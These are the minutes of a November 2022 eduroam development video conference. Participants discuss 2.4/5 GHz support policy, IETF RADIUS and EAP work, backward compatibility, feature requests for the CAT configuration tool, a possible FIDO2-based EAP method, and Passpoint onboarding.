eduroam Development VC Minutes 2022-11-08 1530 CET

Attendance

Attendees

• Stefan Winter (Restena)
• Tomasz Wolniewicz (PSNC)
• Wenche Backman-Kamila (CSC/Funet)
• Ed Kingscote (CANARIE)
• Mohit Sharma (CANARIE)
• Chris Phillips (CANARIE)
• Stephanie Cooper (ANYROAM)
• Philippe Hanset (ANYROAM)
• Zbigniew Ołtuszyk (PSNC)
• Paul Dekkers (SURF)
• Guy Halse (TENET)
• Stefan Paetow (Jisc)
• Maja Gorecka-Wolniewicz (PSNC)
• Mike Zawazcki (Internet2)
• Anders Nilsson (SUNET)
• Ed Wincott (Jisc)
• Arnaud Lauriou (RENATER)
• Kilian Krause (Uni Stuttgart)
• Janos Mohacsi (KIFU)

Regrets

Agenda / Proceedings

1. Welcome / Agenda Bashing

2. Chris: inquisitive on sentiment on 2.4ghz /5ghz trajectory and sentiment on base eduroam support (obligations?? --> is it still ‘eduroam’ if not on 2.4ghz?)
   no policy issue with providing only 5 GHz - it is still eduroam (for those who are still able to connect)

• observations
• no 2.4ghz reduces coverage as it is capable of increased range than 5ghz
• the 6ghz range (future) requires 5ghz for wifi alliance acredited
• experience is that users are driven to cheaper devices thus cannot use eduroam (if 2.4 disabled, sacrifices these users)

1. IETF Update (short - immediate meeting follow-up)
   • radextra BoF
     • -> forming working group (will update RFC6614 as one of the first; define an SRADIUS that gets rid of shared secrets; deprecates RADIUS/UDP when not on secure networks)
     • https://www.ietf.org/mailman/listinfo/radext
     • vendors and deployers in the room, broad support for implementing and deploying this
   • emu discussing
     • onboarding issues and server validation
     • even eap-metadata was a topic
     • private vs. public CA

3a. Backward compatibility discussion

• lots of fancy new stuff comes out of IETF, WFA, …
• but there are many devices and people out there that need support for “legacy”; sometimes for 10+ years
• need to strike a balance between embracing new things vs. caring for the long tail of existing deployed tech
• We should try our best to conserve the long tail connectivity (but not be shy to include new things so long as the don’t break a large part of our userbase)

1. CAT feature requests:
   a. “CAT Lower Decks”
   * entry-level administrator privileges that can do realm testing, but no config changes
   * Good idea?
   * Might be useful, via the invitation workflow (choose to invite either a “real” admin or the new role - new roles could age-out automatically)
   * Generally interest in this. Investigate how easily this is doable.

   b. “NRO View Institution”
   * Ability to view only in the UI for institution/profile without taking full control of the organization.
   * Good idea?
   * Also nice to have.
   * Ephemeral equivalent of “Take Control” - only impersonate IdP for the session.
   * maybe even higher prio than a)

   c. MAC randomisation control in profiles
   * This has been raised before (back when iOS 14 arrived)
   * Useful motivations for this?
   * Exposure to liability (OS provides Privacy and you block it)
   * Bad messaging in OSes if such a feature is on - marketing impact “eduroam is insecure”
   * Conclusion: Not every IdP in the world has to use CAT. Maybe a different product is better for them.

2. Crazy IETF idea (deferred)

   • in an earlier call, someone mentioned the word Passkey; and it happened again during the IETF emu meeting
   • It is probably possible to use FIDO2 security keys / Passkeys also for Enterprise Wi-Fi authentication
   • We’re talking no less than a brand new EAP type here (“EAP-FIDO”)
   • (this agenda item can and will suck up every minute the other topics still leave free)

3. Recurring: Passpoint hardware and onboarding chit-chat

4. AOB / next VC: 22 Nov 2022 1530 CET